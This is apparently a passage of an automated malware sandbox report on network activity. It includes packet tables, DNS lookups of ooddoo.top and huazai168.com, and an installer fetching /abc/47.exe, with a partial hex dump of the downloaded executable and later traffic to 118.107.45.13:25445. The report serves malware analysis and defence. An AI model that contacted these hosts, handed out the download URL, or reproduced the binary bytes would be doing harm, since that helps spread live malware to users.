Dec 29, 2024 04:24:33.670443058 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.670460939 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.670541048 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.670547962 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.670609951 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.676091909 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.676105976 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.676166058 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.676172018 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.676292896 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.682070971 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.682089090 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.682147026 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.682153940 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.683366060 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.688292027 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.688308954 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.688471079 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.688478947 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.688724995 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.839034081 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.839054108 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.839127064 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.839137077 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.839184999 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.845093012 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.845108032 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.845191002 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.845199108 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.845244884 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.851011038 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.851041079 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.851133108 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.851140022 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.851373911 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.856446028 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.856462955 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.856539011 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.856545925 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.859380007 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.862474918 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.862490892 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.862585068 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.862591982 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.863365889 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.868119001 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.868134975 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.868205070 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.868212938 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.871366024 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.874174118 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.874190092 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.874275923 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.874283075 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.875372887 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.880150080 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.880166054 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.880234003 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:33.880240917 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:33.883374929 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.031034946 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.031060934 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.031284094 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.031301022 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.031357050 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.037096977 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.037113905 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.037189960 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.037199974 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.039331913 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.043061018 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.043077946 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.043173075 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.043179989 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.043226957 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.048440933 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.048458099 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.048553944 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.048563004 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.048609018 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.052859068 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.052896976 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.052947044 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.052951097 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:34.052989960 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.053018093 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.136331081 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:34.136347055 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:37.297578096 CET	49767	25445	192.168.2.6	118.107.45.13
Dec 29, 2024 04:24:37.417082071 CET	25445	49767	118.107.45.13	192.168.2.6
Dec 29, 2024 04:24:37.417263985 CET	49767	25445	192.168.2.6	118.107.45.13
Dec 29, 2024 04:24:38.590187073 CET	49767	25445	192.168.2.6	118.107.45.13
Dec 29, 2024 04:24:38.709764004 CET	25445	49767	118.107.45.13	192.168.2.6
Dec 29, 2024 04:26:09.417422056 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:26:09.537832975 CET	80	49740	172.67.165.100	192.168.2.6
Dec 29, 2024 04:26:09.538435936 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:27:38.786164999 CET	49767	25445	192.168.2.6	118.107.45.13
Dec 29, 2024 04:27:38.905695915 CET	25445	49767	118.107.45.13	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 04:24:19.409997940 CET	64313	53	192.168.2.6	1.1.1.1
Dec 29, 2024 04:24:19.977686882 CET	53	64313	1.1.1.1	192.168.2.6
Dec 29, 2024 04:24:36.671287060 CET	50904	53	192.168.2.6	1.1.1.1
Dec 29, 2024 04:24:37.234251022 CET	53	50904	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 04:24:19.409997940 CET	192.168.2.6	1.1.1.1	0x8933	Standard query (0)	ooddoo.top	A (IP address)	IN (0x0001)	false
Dec 29, 2024 04:24:36.671287060 CET	192.168.2.6	1.1.1.1	0xacb7	Standard query (0)	huazai168.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 04:24:19.977686882 CET	1.1.1.1	192.168.2.6	0x8933	No error (0)	ooddoo.top	172.67.165.100	A (IP address)	IN (0x0001)	false
Dec 29, 2024 04:24:19.977686882 CET	1.1.1.1	192.168.2.6	0x8933	No error (0)	ooddoo.top	104.21.81.224	A (IP address)	IN (0x0001)	false
Dec 29, 2024 04:24:37.234251022 CET	1.1.1.1	192.168.2.6	0xacb7	No error (0)	huazai168.com	118.107.45.13	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ooddoo.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49740	172.67.165.100	80	3220	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 04:24:26.917993069 CET	188	OUT	GET /abc/47.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 04:24:28.111507893 CET	1013	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 29 Dec 2024 03:24:27 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 29 Dec 2024 04:24:27 GMT Location: https://ooddoo.top/abc/47.exe Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mngQ4p1uXZN9weezCAN%2FmHiWr4Bvv5Yt1oofY37CmEl5vmZFRAhnnulzWz8SSmEnpmoGzKVrw7%2FlSdRDkBrH83fVi9V0J3xLBGyi43y4k6XAYVhlEcSjk8RNU51A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f96ad628d37429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=188&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	172.67.165.100	443	3220	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 03:24:21 UTC	188	OUT	GET /abc/47.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
2024-12-29 03:24:22 UTC	900	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 03:24:22 GMT Content-Type: application/octet-stream Content-Length: 2633392 Connection: close Last-Modified: Sun, 29 Dec 2024 02:39:00 GMT Accept-Ranges: bytes ETag: "bb8d3ed19a59db1:0" Cache-Control: max-age=14400 cf-cache-status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7U%2BGsFvlQPjMtilUQxNQ9ysmtJ%2BKEGHtI0B%2FJZusuGA0aEPE9Vz%2Fe1IiddFIJ9hDvccJ63GfZmokgG%2BsXRcc5t1RO5QZTezFNyQByi9WS4rkULxsFB90X00qE2A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f96ad3aaf607cf4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1759&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=802&delivery_rate=1604395&cwnd=217&unsent_bytes=0&cid=63c803534120ace4&ts=932&x=0"
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY\|zuYzuYwzuRich{u
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 56 9c 24 96 1b ba 46 54 5d 64 b0 44 3b dd 4d d4 ce c5 cd e1 43 04 ea 24 8c d4 e1 3a 1e 46 ce 3f 87 92 e8 ef 0c c6 be 2c 7e 34 3c 86 5f d6 f4 e3 cc fe b4 7b 62 1c ba 95 f1 30 a2 62 2a c2 6a 91 60 7c 5e 95 c2 cc 09 50 37 00 f6 12 6b e9 d7 6a 92 c1 05 48 7d 14 fe 20 fc 38 4c d4 6f 00 2c 54 42 61 71 c9 1f 7c 51 51 3c 37 58 62 b7 cc 16 2b 66 90 ed 35 54 25 96 1b e8 46 b3 23 7a bd b4 68 0a 06 2a 83 19 5b 31 37 2f 43 d8 3d e7 38 d0 9c 07 ca bb 3c 07 c0 6c 00 5e 4e eb 80 04 c8 0b fb ae 4b d3 08 dd 4c f1 5d 2a 1b b0 9f d0 88 14 75 13 06 62 d6 42 6a 11 71 78 04 54 b0 60 9a 69 11 6a 58 83 17 65 8f d4 67 21 7d 3c 8a a2 56 98 e9 fb 38 e0 64 50 82 14 4d f9 ea 42 6b 33 43 ed 1e f8 a9 75 64 fd f7 39 69 e0 c7 6e 32 7c 01 fb 90 0f df 79 df c5 2b 2c c8 fc 04 b5 84 da 08 cb Data Ascii: V$FT]dD;MC$:F?,~4<_{b0bj`\|^P7kjH} 8Lo,TBaq\|QQ<7Xb+f5T%F#zh[17/C=8<l^NKL]*ubBjqxT`ijXeg!}<V8dPMBk3Cud9in2\|y+,
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 85 64 60 aa 2c 20 82 da fd a4 9a fe e5 24 2d d2 db 11 3a 64 dc 5c 98 c2 d5 4e 80 54 9e 2b de 52 69 0c a0 6a ee 75 5b d0 f8 ab a8 4c 5e 5e 58 e5 3f 55 32 d9 68 2c 0e 0b 05 12 76 a8 87 5b c4 94 2c a4 ce 3c 86 b2 7d 5d 08 ac fa ee 8e 9d f6 47 da b5 dc ba 4f e4 78 dc a6 0c a8 53 06 f7 ee e8 1d 0c 8c 64 df 92 8a 44 c7 07 6e 46 ee a5 73 ef be 2d ca 65 65 3d cb 6d a5 31 0a bd c6 91 73 c9 2a 94 e3 d2 c2 e9 24 6b bc af 6e 82 24 fe 58 7c 63 80 f8 ee 36 2d 3d 0a 75 e8 51 73 ce 41 7f 2f 45 5b a0 12 cc c6 96 a5 2f 6c f0 19 0c 20 44 3a df 5a 35 33 82 d6 78 2a f9 02 5b 68 e9 6e 5b 54 4d 6a 2b 49 08 3b 77 0e 1c e4 29 f9 c7 26 41 a8 19 11 26 82 bc 08 e3 c9 f5 2d 46 c6 7f d3 32 9a 0d b4 a2 4e 08 e0 f6 f0 3a ad 64 af 1c c1 6f 21 c6 03 7d fa 75 76 6e 7b 7f e8 60 82 6f 6b 36 Data Ascii: d`, $-:d\NT+Riju[L^^X?U2h,v[,<}]GOxSdDnFs-ee=m1s$kn$X\|c6-=uQsA/E[/l D:Z53x[hn[TMj+I;w)&A&-F2N:do!}uvn{`ok6
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 8f 05 9d 05 34 61 45 0d 8a e0 28 03 31 4c ea 49 cf a3 7c 22 72 b4 76 1a 5e 08 13 00 74 26 9d ba b1 b6 77 db d4 0c 7e 0f cd e3 e1 f1 d3 5c 04 19 01 6c 29 ce e9 c8 6d 41 98 24 3d 1e b0 b4 7e 28 e0 ad 3d bc f7 69 d6 ca 40 c9 26 92 b2 24 6b 1a 46 70 ac 0d 91 5a 81 c2 80 e9 b9 1e 89 6b 74 4f a2 bc 1d 4a c0 93 1d af a8 97 e4 dd af 51 ab f8 c2 50 e4 c8 db 2b ee 45 37 94 5b 23 de 25 e4 0f 42 97 bc 2b fc e1 a4 28 4e 7c 60 89 cb 96 8c ad 9a 6a 04 3e 71 b7 7f 74 fd 77 ef c8 75 78 5e 32 b2 8c 16 02 19 c0 5c 2a 94 3c aa 6d b1 0a 1e d6 85 20 61 0d 6b 98 5e 91 9f 40 6e 1e 11 e8 3c e9 e0 18 20 99 6c 40 cc c2 b5 45 ac c9 67 9c 82 d3 73 4a c4 37 c4 59 7c d6 5f 18 4c ac 26 5d 0e d8 5f bf a7 54 3a 68 1c 71 0e 5f 66 25 64 59 41 6f 76 c7 f7 0e bb d0 d2 ca 4d 04 43 29 b4 7f a3 Data Ascii: 4aE(1LI\|"rv^t&w~\l)mA$=~(=i@&$kFpZktOJQP+E7[#%B+(N\|`j>qtwux^2\*<m ak^@n< l@EgsJ7Y\|_L&]_T:hq_f%dYAovMC)
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 9c 6a 23 32 fd e5 6e 74 14 76 32 2e 65 43 48 93 41 7b c9 03 e1 0f da 5e 8f b5 e5 df b3 3a b2 c0 51 75 36 7e 4f 8e 18 3c b2 64 4b 34 49 d8 35 85 4e 81 67 9b 9e 47 43 6a 1c e9 66 d6 64 80 d6 af 8d 5a 4c 23 97 83 23 2c 51 8d 7c ed 49 64 35 c9 fb 7f 8c c8 e8 2b c9 3f 6a 5e c5 e9 16 37 89 e5 ea 3e 27 90 81 cd d5 63 64 61 22 4f 4e 2c 0e 2b bd 40 78 4f 92 3f 00 05 78 8c 49 67 50 50 cb 2e 9f f9 0f 67 46 8e c6 ad 6e 2c 78 14 a0 37 1f e9 3a 82 60 b6 9e 4e 6a e0 6a 8a c7 fd a5 16 98 42 7a 52 6e ef 57 a0 98 9a ee 0f 29 5d e6 74 db 49 ec 0f 02 7a e1 7e 19 5d 8c 40 20 83 ef 4f f1 31 4d a7 61 5c 57 7b de 58 39 d1 0c e9 27 97 53 4c 25 12 21 33 8c aa 96 90 0b 47 56 ef 55 f5 5c 14 19 40 f8 e8 24 c1 d7 ca 64 68 3f 6b 54 32 c8 58 8f c5 21 e6 c3 61 7a 45 42 2a d9 55 bd 72 e1 Data Ascii: j#2ntv2.eCHA{^:Qu6~O<dK4I5NgGCjfdZL##,Q\|Id5+?j^7>'cda"ON,+@xO?xIgPP.gFn,x7:`NjjBzRnW)]tIz~]@ O1Ma\W{X9'SL%!3GVU\@$dh?kT2X!azEB*Ur
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: bd 4b 3e ef 4f ee 51 83 82 ec 72 a9 17 81 55 f6 83 3e dd 94 a7 60 ec dc 15 98 0e 13 5a 08 8f de 14 70 c8 26 e0 50 e2 5b 56 49 e3 df 6a 4a e9 e9 01 f2 d4 6b 8a d1 cd ae 98 27 a7 27 74 48 d5 e6 6f fe 14 47 3f 57 64 87 78 e2 aa 51 ad f5 af 84 e5 3a 93 6b 6c 45 30 99 d2 bf 87 13 8a ca e9 3d de 53 cc 4e d8 db 3d 4b 63 11 b0 ff 53 f7 9f c8 de db 26 84 90 3a 6b 53 a3 0e 43 03 23 8f 7f f3 af 8b 31 8f 3f 92 5c fb 6a 0a db c3 24 2a 0e 65 26 3f 59 6e e1 31 23 6f 0e 2b 72 6c d6 eb e5 a5 20 71 ee 44 7c 3a ef 5c 72 1b 8c e4 6f 94 de d8 22 ab 2e 3b c0 78 b0 2c 30 78 fc fc 90 31 5e 30 6f 31 ef f0 72 40 32 50 76 a2 e8 6c 3d 86 8f af 2a 8c d7 4d c4 8f e7 14 77 b1 87 f7 0c 33 ec 9f da 76 2d 6d 0b c6 44 8a 79 d7 96 4d 8a 11 aa 84 ec ce 76 96 38 cb e2 40 86 ca 39 1a 23 87 62 Data Ascii: K>OQrU>`Zp&P[VIjJk''tHoG?WdxQ:klE0=SN=KcS&:kSC#1?\j$e&?Yn1#o+rl qD\|:\ro".;x,0x1^0o1r@2Pvl=Mw3v-mDyMv8@9#b
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 0d 31 64 47 02 80 3d 5d da bb a2 ae 3a b7 45 d0 07 e4 a2 3f c6 ab 9d 51 11 a4 f6 31 37 f9 5b d7 83 50 64 bd f5 7a e9 2a 30 30 50 ca 60 a5 74 7c d4 cd e6 8d 00 48 e2 a4 db ea 90 3a 41 27 1a 74 47 26 0e 53 8e b6 2f 3d 93 85 ec d9 cf 79 3a 02 23 32 b0 43 1b 1b ca 33 df 81 0f dc 39 f5 38 30 a2 a7 78 f1 cf 2c 7a 85 9f 93 51 23 d6 62 bc 62 4b 3c 76 ad 1f 84 98 4c 45 f1 68 68 33 2c 19 50 b0 a6 57 64 c0 64 76 5a 70 53 97 6f 4e 96 8f 45 5d 5c 48 2a 48 e5 4c fe 55 be e4 1d 03 e7 a4 6f 0f bc ee 01 83 04 b8 9a 99 ee 90 f3 cd a9 27 87 0f 6c c0 b9 6d b8 04 fd d5 b0 a4 f0 93 15 ff a6 c1 dc 66 92 cd ae a1 83 d8 a8 b8 fe d8 39 ed 48 29 ce 07 3f a5 65 d6 1d 69 de 9b 41 de 2f 30 db cf 87 e9 a7 a8 c9 4f 9d ec 24 6e 5f 7f ec e2 f5 1b 0e c3 60 8c ad 53 7d 31 2a f2 bc cd 32 81 Data Ascii: 1dG=]:E?Q17[Pdz00P`t\|H:A'tG&S/=y:#2C3980x,zQ#bbK<vLEhh3,PWddvZpSoNE]\HHLUo'lmf9H)?eiA/0O$n_`S}1*2
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: e4 a4 5f 60 7e 96 23 b7 67 92 57 3a 68 ec 45 26 3b 97 84 19 f7 81 44 f3 30 fe b1 67 ae 4f 90 99 17 63 0e 24 b7 b7 a3 21 04 6d 4f fc ae ec b6 3d f1 3b a0 5c 37 8a ae a4 65 23 1a 55 9a 10 67 29 86 c7 09 1b 99 c3 16 06 91 97 83 14 89 ad 1b d3 22 31 8b 2a db d5 01 db ec e1 6a 71 bc ef 82 8e e3 a9 b8 c2 95 e9 2d 2e ee 4c 90 36 68 13 27 c6 2e ee 38 81 cc 6b 57 e6 5e 8e 8c 66 4f 28 62 14 c6 cf 75 c0 34 ff 6d b1 2a cb 34 96 99 10 2d ac c3 05 27 0e a7 56 51 36 96 50 37 f1 c4 62 c2 f3 c4 19 b3 c2 99 e0 76 48 fc 19 99 03 33 3c ac 28 a9 92 4a 1d 74 23 62 cb 5a ae 56 c8 9d 71 3c 21 e4 a2 7b c8 0b 81 95 bb 2a 63 1e c3 04 74 4c d0 4f 62 22 da 24 f7 b0 79 97 bb 9b 88 01 8b 92 8c 99 bd 5e 17 56 b8 19 c6 37 c6 ce d1 85 66 5a d4 af 44 cc 33 9b 5b 5b 07 62 c4 2a 46 dd 91 5d Data Ascii: _`~#gW:hE&;D0gOc$!mO=;\7e#Ug)"1jq-.L6h'.8kW^fO(bu4m4-'VQ6P7bvH3<(Jt#bZVq<!{ctLOb"$y^V7fZD3[[bF]
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 01 53 70 6d 32 a0 36 38 1b 88 4b 4d 4c a1 de ae 40 4c d5 e9 96 75 cc 81 32 46 fc 3d a4 85 17 d2 32 76 e2 95 4b e7 ca a0 c4 a9 d1 b4 24 f6 ce 0d 51 63 07 64 8d f6 04 2f f0 49 dd e5 70 ff f1 ea 43 0c 86 cd 83 1c 4b b7 ef 5d 7e 70 48 dd 78 d5 88 e6 06 bd ee 25 10 a6 b8 05 58 0c 5e 31 9e e5 90 58 46 27 2c 8b 0e ce 70 32 95 54 4c f1 cf 21 88 2d 9b 09 1b 3d a0 b7 07 3c 77 e0 af 26 74 de bc a4 df e5 8c cc 28 7b 51 fa f0 67 04 7d 72 3d 6f 56 c9 e4 5f 21 2a 87 4d 3d d5 77 97 5e 45 f0 ab 7d 73 68 e1 5a a9 70 fc 62 fe 35 6f 5c ee 7a 32 7d 41 f0 34 32 0e e1 6c 37 89 13 5f af 28 90 50 0a 35 35 94 c6 7f e1 8c 2c 55 2c 8c 96 4d ef b1 0e d4 2e 69 51 98 9b 4c 6f 46 83 2c 2e 21 dc 3f ea 23 eb 56 c1 c3 72 a9 62 06 3b fd 05 b1 ef ee f3 1f a1 18 58 60 09 01 c0 55 b0 80 2a 5a Data Ascii: Spm268KML@Lu2F=2vK$Qcd/IpCK]~pHx%X^1XF',p2TL!-=<w&t({Qg}r=oV_!M=w^E}shZpb5o\z2}A42l7_(P55,U,M.iQLoF,.!?#Vrb;X`UZ
2024-12-29 03:24:22 UTC	1369	IN	Data Raw: 63 8c 80 6b 06 11 ec 93 b8 b0 60 61 4a 91 62 9c 2b 97 aa 14 d5 c5 1f 6e ff 13 e2 6f 4d 11 c9 8f f8 15 33 14 39 65 0d 0d aa 04 72 64 f4 92 3c 04 5b cd 72 92 f6 4d 52 8c 9d c1 82 ed 40 75 90 7c 5c 6e 44 23 82 eb 5c fd fe 97 d5 65 ae 72 e5 49 ae c2 41 41 a0 e3 eb 44 ff 81 f5 6c 44 2c 82 60 0e d1 7d 60 f6 4c b1 14 5c 4a 73 c9 09 c1 9f dd 98 0e 4a 05 6a c5 ee 21 ca 73 4c b6 da 8a 13 41 65 b3 84 6e b2 05 5a ab 6c 6c bb f7 91 26 b6 1b 52 15 13 50 6b 49 3c f4 69 06 af d4 66 7d a8 df 67 c9 15 75 e2 de 71 2f 38 66 8c df 56 27 89 d7 9a ed 78 92 fc 0c 3a 2e 43 9f d5 88 5d 55 2a ef 96 e3 95 a6 b7 58 fa 58 fd 3e 05 d7 58 5a 33 9d ee 41 f5 63 5d cd 34 4e 84 1d 99 34 dd ce 64 97 ed c7 c0 79 3b 01 7a df 6d 40 6d 76 32 4e 48 0b 60 f1 25 7d f1 d8 94 17 48 5e 4c 82 d8 d4 04 Data Ascii: ck`aJb+noM39erd<[rMR@u\|\nD#\erIAADlD,`}`L\JsJj!sLAenZll&RPkI<if}guq/8fV'x:.C]U*XX>XZ3Ac]4N4dy;zm@mv2NH`%}H^L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49746	172.67.165.100	443	3220	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
